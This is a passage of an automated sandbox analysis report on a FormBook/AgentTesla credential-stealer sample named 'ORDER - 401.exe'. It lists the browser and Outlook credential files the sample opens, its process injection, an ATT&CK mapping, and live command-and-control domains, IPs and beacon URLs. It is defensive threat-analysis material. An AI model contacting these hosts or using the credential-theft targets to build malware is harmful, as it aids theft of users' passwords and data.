                Source: C:\Users\user\Desktop\ORDER - 401.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.ORDER - 401.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.ORDER - 401.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.4677196971.0000000004120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2476991875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2477699059.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4677244560.0000000004170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.4679125210.0000000005500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2479332677.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\ieUnatt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\ieUnatt.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.ORDER - 401.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.ORDER - 401.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.4677196971.0000000004120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2476991875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2477699059.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4677244560.0000000004170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.4679125210.0000000005500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2479332677.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		312
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook312
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1575104 Sample: ORDER - 401.exe Startdate: 14/12/2024 Architecture: WINDOWS Score: 100 34 www.aziziyeescortg.xyz 2->34 36 www.54248711.xyz 2->36 38 17 other IPs or domains 2->38 46 Suricata IDS alerts for network traffic 2->46 48 Antivirus detection for URL or domain 2->48 50 Multi AV Scanner detection for submitted file 2->50 54 6 other signatures 2->54 10 ORDER - 401.exe 3 2->10         started        signatures3 52 Performs DNS queries to domains with low reputation 36->52 process4 file5 32 C:\Users\user\AppData\...\ORDER - 401.exe.log, ASCII 10->32 dropped 13 ORDER - 401.exe 10->13         started        16 ORDER - 401.exe 10->16         started        18 ORDER - 401.exe 10->18         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 20 ZaZCnGdXtY.exe 13->20 injected process8 signatures9 56 Found direct / indirect Syscall (likely to bypass EDR) 20->56 23 ieUnatt.exe 13 20->23         started        process10 signatures11 58 Tries to steal Mail credentials (via file / registry access) 23->58 60 Tries to harvest and steal browser information (history, passwords, etc) 23->60 62 Modifies the context of a thread in another process (thread injection) 23->62 64 3 other signatures 23->64 26 ZaZCnGdXtY.exe 23->26 injected 30 firefox.exe 23->30         started        process12 dnsIp13 40 123hellodrive.shop 84.32.84.32, 49998, 50004, 50012 NTT-LT-ASLT Lithuania 26->40 42 www.artkub.net 185.42.14.166, 49917, 49929, 49935 MULTIHOST-ASRU Russian Federation 26->42 44 11 other IPs or domains 26->44 66 Found direct / indirect Syscall (likely to bypass EDR) 26->66 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                ORDER - 401.exe77%VirustotalBrowse
                ORDER - 401.exe63%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                ORDER - 401.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://lameo.nrkeiu.tdvgb.cn/123.html0%Avira URL Cloudsafe
                http://www.123hellodrive.shop/vc3u/100%Avira URL Cloudmalware
                https://moneyeasilynac.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==0%Avira URL Cloudsafe
                http://www.54248711.xyz/e48k/0%Avira URL Cloudsafe
                http://www.bagatowcannabis.cloud/zmax/0%Avira URL Cloudsafe
                http://www.7261ltajbc.bond/vt4e/?NVK8=VWo59DE7z/zpNvlQrGwQqnlKKikmhHzFU/awM9upW87Yx15oShf3plLjnAS2lxJKaRtg2RYIywQ4d8OifO+R6Wiy9G2ixVXSMqx2pS2jo8Wgf7OcwrfnpeCilt1Zi3OUog==&V6T=lB24KzN0lF-80%Avira URL Cloudsafe
                http://www.kkpmoneysocial.top/86am/0%Avira URL Cloudsafe
                http://www.supernutra01.online/b156/0%Avira URL Cloudsafe
                http://www.muasamgiare.click/bsye/100%Avira URL Cloudmalware
                https://moneyeasilypao.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==0%Avira URL Cloudsafe
                http://www.guacamask.online/px.js?ch=20%Avira URL Cloudsafe
                http://www.guacamask.online/v2ut/0%Avira URL Cloudsafe
                http://www.happyjam.life/4t49/?NVK8=qSUUy2RUpcHfgeDYScePJkyQ5UV89Z0x3ukWI3F+j71sN74kYD8q/afbxdu8+w0uynd4aRJgg192nr/hQaDB6X5vsGIHc1mVtIO2AR3GSaQwpWdADtOmAN4eNIbS06uucA==&V6T=lB24KzN0lF-80%Avira URL Cloudsafe
                http://www.kkpmoneysocial.top/86am/?V6T=lB24KzN0lF-8&NVK8=3oSH5g+vR97eOiEYl3yzUVrLMoE7cdRqP5dq8IAVURGuW00cQLCZ5FvWMVk05HdygRwRYgTMj/cz+G8Xe6buvt3CihlxRoa3yNm7JisfhZdaiIXVwsk9uJu6AhIF/VUrZw==0%Avira URL Cloudsafe
                https://kb.fastpanel.direct/troubleshoot/0%Avira URL Cloudsafe
                http://www.aziziyeescortg.xyz/2pcx/0%Avira URL Cloudsafe
                http://www.muasamgiare.click/bsye/?NVK8=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jK2v2RF378l0UeaVYff77sSRT2IMU8cGlDr+1A+pKQ3eOAfVunh78ZhwTBEsJdZkSwuIREwgA==&V6T=lB24KzN0lF-8100%Avira URL Cloudmalware
                https://moneyeasilysni.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==0%Avira URL Cloudsafe
                http://www.litespeedtech.com/error-page0%Avira URL Cloudsafe
                http://www.dietcoffee.online/725g/0%Avira URL Cloudsafe
                http://www.123hellodrive.shop/vc3u/?NVK8=BIzO2x/CParM8yIJPtdG01YaZAIKO+ejS6SUxHNGTKrV1frM7wJkom86Bn77y9QMlkCGGhfkfqeUHrw85/0eQ2l+TkULL/wTF5DWx+rJ04uuxIumVF9zXUy61c1Y+8cRSQ==&V6T=lB24KzN0lF-8100%Avira URL Cloudmalware
                http://www.guacamask.online/px.js?ch=10%Avira URL Cloudsafe
                http://www.zoomlive.live/k6vm/0%Avira URL Cloudsafe
                http://www.artkub.net/q5xl/0%Avira URL Cloudsafe
                https://moneyeasilysfl.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==0%Avira URL Cloudsafe
                http://www.54248711.xyz/e48k/?V6T=lB24KzN0lF-8&NVK8=xChAp+bkagQqJ6WkRQ2a7hjYaWsF9/M9/8HR53jdsKBVrNgXqnyx46Jn2F+RutsZwBel4mZ5ysAGK73cAQnl7mQqaam/kdOg/hlIEVseDVvXkJ4BLCZJtbvg9L026A0VzA==0%Avira URL Cloudsafe
                http://www.bagatowcannabis.cloud0%Avira URL Cloudsafe
                https://www.muasamgiare.click/bsye/?NVK8=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jK100%Avira URL Cloudmalware
                http://www.dietcoffee.online/725g/?NVK8=uiAekWsFoddhMu9w6av3IR3qRfkxEYhiHCdKsu6SwDAva+OcXfn0u3hNB8zZhz0kzkOslwZXAdf6Zktj+FCGwDQIl+yrmVlx7FOU7ZgH2yDrtJhtO3pBjm+x7Tk1qeJTKw==&V6T=lB24KzN0lF-80%Avira URL Cloudsafe
                http://www.guacamask.online/sk-logabpstatus.php?a=MnJENVJwV2lhZW0rV2U4VmdEend6Tm5ucmlLSndTR0pwVHBzV30%Avira URL Cloudsafe
                http://www.artkub.net/q5xl/?NVK8=NXHvlplEz+AaHjlx30Dg0ITo3hgweafquKqjP3Y/xf7/cg6iHYjvJgtir9Vs9Xh3XfF5Sx90CNRcQ8yUM+iNQ/JKoQzS5dKBNmaKnzIoSlYQ6FYKM8mOI3dFoEeNlxQJdw==&V6T=lB24KzN0lF-80%Avira URL Cloudsafe
                http://www.appsolucao.shop/qt4m/100%Avira URL Cloudmalware
                http://www.supernutra01.online/b156/?NVK8=MVl1gD/31V017FUigyITB4WoU9vk2cZhWu89n4n57hetIOD+Bt387g2PwEolcziFwxZdvjZz2ToeNo5P6wKUsiSm8Z0p8wGBislo5nJGFMbTDcQ3U8CjU56G6a4dIAJwvA==&V6T=lB24KzN0lF-80%Avira URL Cloudsafe
                http://www.appsolucao.shop/qt4m/?NVK8=/ZQwF7Ip71YCaUlU/jTQ7l2Lp/ZTQN44rx1LzCy9bB7kVb+FnyrErN7h2wh6V0uCxKMxAv7qgoDPyMkbBqZLZiqSzgxnAs9V7XipQDSCcuTG51JuJsWtbCKrsXwQUSP17A==&V6T=lB24KzN0lF-8100%Avira URL Cloudmalware
                http://www.happyjam.life/4t49/0%Avira URL Cloudsafe
                http://www.zoomlive.live/k6vm/?NVK8=AQF0fE/xUBvXcoq8VPDc3VbpsTF0nlDqSFZLjGUQNoLeoSEU8z/8yZQb5sAEaF7nLYLL9iygL0eptKGi7pEn81f5kD6IPefKaW6E3aQWqTb4uuDSc/wDXdngD5uc1XtZiQ==&V6T=lB24KzN0lF-80%Avira URL Cloudsafe
                https://www.kkpmoneysocial.top0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.aziziyeescortg.xyz
                		104.21.77.71
                		truetrue
                  		unknown
                  www.guacamask.online
                  		208.91.197.27
                  		truetrue
                    		unknown
                    www.artkub.net
                    		185.42.14.166
                    		truetrue
                      		unknown
                      www.kkpmoneysocial.top
                      		172.67.129.38
                      		truetrue
                        		unknown
                        www.supernutra01.online
                        		172.67.220.36
                        		truefalse
                          		high
                          appsolucao.shop
                          		84.32.84.32
                          		truetrue
                            		unknown
                            www.7261ltajbc.bond
                            		154.12.28.184
                            		truetrue
                              		unknown
                              123hellodrive.shop
                              		84.32.84.32
                              		truetrue
                                		unknown
                                dns.ladipage.com
                                		13.228.81.39
                                		truefalse
                                  		high
                                  54248711.xyz
                                  		162.0.217.35
                                  		truetrue
                                    		unknown
                                    bagatowcannabis.cloud
                                    		81.2.196.19
                                    		truetrue
                                      		unknown
                                      www.zoomlive.live
                                      		154.208.202.225
                                      		truetrue
                                        		unknown
                                        www.dietcoffee.online
                                        		77.68.64.45
                                        		truefalse
                                          		high
                                          www.happyjam.life
                                          		209.74.77.107
                                          		truetrue
                                            		unknown
                                            www.54248711.xyz
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.muasamgiare.click
                                              		unknown
                                              		unknownfalse
                                                		unknown
                                                www.123hellodrive.shop
                                                		unknown
                                                		unknownfalse
                                                  		unknown
                                                  www.bagatowcannabis.cloud
                                                  		unknown
                                                  		unknownfalse
                                                    		unknown
                                                    www.appsolucao.shop
                                                    		unknown
                                                    		unknownfalse
                                                      		unknown

                                                      Contacted URLs

                                                      NameMaliciousAntivirus DetectionReputation
                                                      http://www.muasamgiare.click/bsye/true
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.123hellodrive.shop/vc3u/true
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.54248711.xyz/e48k/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.7261ltajbc.bond/vt4e/?NVK8=VWo59DE7z/zpNvlQrGwQqnlKKikmhHzFU/awM9upW87Yx15oShf3plLjnAS2lxJKaRtg2RYIywQ4d8OifO+R6Wiy9G2ixVXSMqx2pS2jo8Wgf7OcwrfnpeCilt1Zi3OUog==&V6T=lB24KzN0lF-8true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.kkpmoneysocial.top/86am/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.bagatowcannabis.cloud/zmax/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.supernutra01.online/b156/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.dietcoffee.online/725g/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.muasamgiare.click/bsye/?NVK8=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jK2v2RF378l0UeaVYff77sSRT2IMU8cGlDr+1A+pKQ3eOAfVunh78ZhwTBEsJdZkSwuIREwgA==&V6T=lB24KzN0lF-8true
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.happyjam.life/4t49/?NVK8=qSUUy2RUpcHfgeDYScePJkyQ5UV89Z0x3ukWI3F+j71sN74kYD8q/afbxdu8+w0uynd4aRJgg192nr/hQaDB6X5vsGIHc1mVtIO2AR3GSaQwpWdADtOmAN4eNIbS06uucA==&V6T=lB24KzN0lF-8true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.guacamask.online/v2ut/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.aziziyeescortg.xyz/2pcx/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.kkpmoneysocial.top/86am/?V6T=lB24KzN0lF-8&NVK8=3oSH5g+vR97eOiEYl3yzUVrLMoE7cdRqP5dq8IAVURGuW00cQLCZ5FvWMVk05HdygRwRYgTMj/cz+G8Xe6buvt3CihlxRoa3yNm7JisfhZdaiIXVwsk9uJu6AhIF/VUrZw==true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.123hellodrive.shop/vc3u/?NVK8=BIzO2x/CParM8yIJPtdG01YaZAIKO+ejS6SUxHNGTKrV1frM7wJkom86Bn77y9QMlkCGGhfkfqeUHrw85/0eQ2l+TkULL/wTF5DWx+rJ04uuxIumVF9zXUy61c1Y+8cRSQ==&V6T=lB24KzN0lF-8true
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.artkub.net/q5xl/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.zoomlive.live/k6vm/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.appsolucao.shop/qt4m/true
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.artkub.net/q5xl/?NVK8=NXHvlplEz+AaHjlx30Dg0ITo3hgweafquKqjP3Y/xf7/cg6iHYjvJgtir9Vs9Xh3XfF5Sx90CNRcQ8yUM+iNQ/JKoQzS5dKBNmaKnzIoSlYQ6FYKM8mOI3dFoEeNlxQJdw==&V6T=lB24KzN0lF-8true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.54248711.xyz/e48k/?V6T=lB24KzN0lF-8&NVK8=xChAp+bkagQqJ6WkRQ2a7hjYaWsF9/M9/8HR53jdsKBVrNgXqnyx46Jn2F+RutsZwBel4mZ5ysAGK73cAQnl7mQqaam/kdOg/hlIEVseDVvXkJ4BLCZJtbvg9L026A0VzA==true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.dietcoffee.online/725g/?NVK8=uiAekWsFoddhMu9w6av3IR3qRfkxEYhiHCdKsu6SwDAva+OcXfn0u3hNB8zZhz0kzkOslwZXAdf6Zktj+FCGwDQIl+yrmVlx7FOU7ZgH2yDrtJhtO3pBjm+x7Tk1qeJTKw==&V6T=lB24KzN0lF-8true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.supernutra01.online/b156/?NVK8=MVl1gD/31V017FUigyITB4WoU9vk2cZhWu89n4n57hetIOD+Bt387g2PwEolcziFwxZdvjZz2ToeNo5P6wKUsiSm8Z0p8wGBislo5nJGFMbTDcQ3U8CjU56G6a4dIAJwvA==&V6T=lB24KzN0lF-8true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.happyjam.life/4t49/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.appsolucao.shop/qt4m/?NVK8=/ZQwF7Ip71YCaUlU/jTQ7l2Lp/ZTQN44rx1LzCy9bB7kVb+FnyrErN7h2wh6V0uCxKMxAv7qgoDPyMkbBqZLZiqSzgxnAs9V7XipQDSCcuTG51JuJsWtbCKrsXwQUSP17A==&V6T=lB24KzN0lF-8true
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.zoomlive.live/k6vm/?NVK8=AQF0fE/xUBvXcoq8VPDc3VbpsTF0nlDqSFZLjGUQNoLeoSEU8z/8yZQb5sAEaF7nLYLL9iygL0eptKGi7pEn81f5kD6IPefKaW6E3aQWqTb4uuDSc/wDXdngD5uc1XtZiQ==&V6T=lB24KzN0lF-8true
                                                      • Avira URL Cloud: safe
                                                      		unknown

                                                      URLs from Memory and Binaries

                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      https://duckduckgo.com/chrome_newtabieUnatt.exe, 00000008.00000003.2661002832.0000000007798000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://dts.gnpge.comZaZCnGdXtY.exe, 0000000A.00000002.4677321335.0000000004144000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          		high
                                                          https://duckduckgo.com/ac/?q=ieUnatt.exe, 00000008.00000003.2661002832.0000000007798000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://lameo.nrkeiu.tdvgb.cn/123.htmlieUnatt.exe, 00000008.00000002.4677795800.0000000004DA4000.00000004.10000000.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.00000000034B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2767212475.0000000038D14000.00000004.80000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://moneyeasilypao.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==ieUnatt.exe, 00000008.00000002.4677795800.00000000050C8000.00000004.10000000.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.00000000037D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://tempuri.org/kviskotekaDbDataSet.xsdcIgraORDER - 401.exefalse
                                                              		high
                                                              https://moneyeasilynac.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==ieUnatt.exe, 00000008.00000002.4677795800.00000000050C8000.00000004.10000000.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.00000000037D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=ieUnatt.exe, 00000008.00000003.2661002832.0000000007798000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchieUnatt.exe, 00000008.00000003.2661002832.0000000007798000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.guacamask.online/px.js?ch=2ieUnatt.exe, 00000008.00000002.4677795800.0000000005A34000.00000004.10000000.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.0000000004144000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.guacamask.online/px.js?ch=1ieUnatt.exe, 00000008.00000002.4677795800.0000000005A34000.00000004.10000000.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.0000000004144000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://hm.baidu.com/hm.js?4aeef933dc234878d84d1123ae8eab9fieUnatt.exe, 00000008.00000002.4677795800.0000000004DA4000.00000004.10000000.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.00000000034B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2767212475.0000000038D14000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoieUnatt.exe, 00000008.00000003.2661002832.0000000007798000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://kb.fastpanel.direct/troubleshoot/ieUnatt.exe, 00000008.00000002.4677795800.0000000005EEA000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4679752589.00000000073B0000.00000004.00000800.00020000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.00000000045FA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.litespeedtech.com/error-pageieUnatt.exe, 00000008.00000002.4677795800.0000000005D58000.00000004.10000000.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.0000000004468000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://moneyeasilysni.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==ieUnatt.exe, 00000008.00000002.4677795800.00000000050C8000.00000004.10000000.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.00000000037D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=ieUnatt.exe, 00000008.00000003.2661002832.0000000007798000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://moneyeasilysfl.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==ieUnatt.exe, 00000008.00000002.4677795800.00000000050C8000.00000004.10000000.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.00000000037D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://www.ecosia.org/newtab/ieUnatt.exe, 00000008.00000003.2661002832.0000000007798000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.muasamgiare.click/bsye/?NVK8=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jKieUnatt.exe, 00000008.00000002.4677795800.0000000004F36000.00000004.10000000.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.0000000003646000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          		unknown
                                                                          https://ac.ecosia.org/autocomplete?q=ieUnatt.exe, 00000008.00000003.2661002832.0000000007798000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.bagatowcannabis.cloudZaZCnGdXtY.exe, 0000000A.00000002.4679125210.00000000055B7000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
